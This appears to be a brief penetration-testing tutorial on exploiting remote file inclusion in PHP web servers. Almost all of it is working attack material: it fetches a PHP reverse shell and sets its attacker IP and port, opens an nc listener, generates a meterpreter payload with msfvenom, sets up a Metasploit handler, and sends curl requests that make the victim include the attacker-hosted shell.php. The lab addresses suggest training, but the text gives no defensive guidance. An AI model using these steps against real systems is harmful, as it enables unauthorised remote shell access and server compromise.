Remote file inclusion
- basically is mounting a online file to the victim.
Cracking a PHP Linux server RFI
curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.php
Edit it with your favourite text editor, we need to change the connection string.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
Mount it online, dont parse to php-fpm.
Lets back to your kali linux, and start listening on port 4444
root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
...
Now you can try to load the file in your victim , something like this:
curl http://192.168.56.104/page=http://192.168.56.101/shell.php
Cracking a PHP Windows server RFI
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 > shell.php
Mount it online, dont parse to php-fpm.
Lets back to your kali linux, enter msfconsole
and use exploit/multi/handler
.
msfconsole
use exploit/multi/handler
set LHOST=192.168.56.101
set LPORT=4444
set payload php/meterpreter/reverse_tcp
exploit
Now you can try to load the file in your victim , something like this:
curl http://192.168.56.104/page=http://192.168.56.101/shell.php
Back to your kali msfconsole
, there should be a shell connected.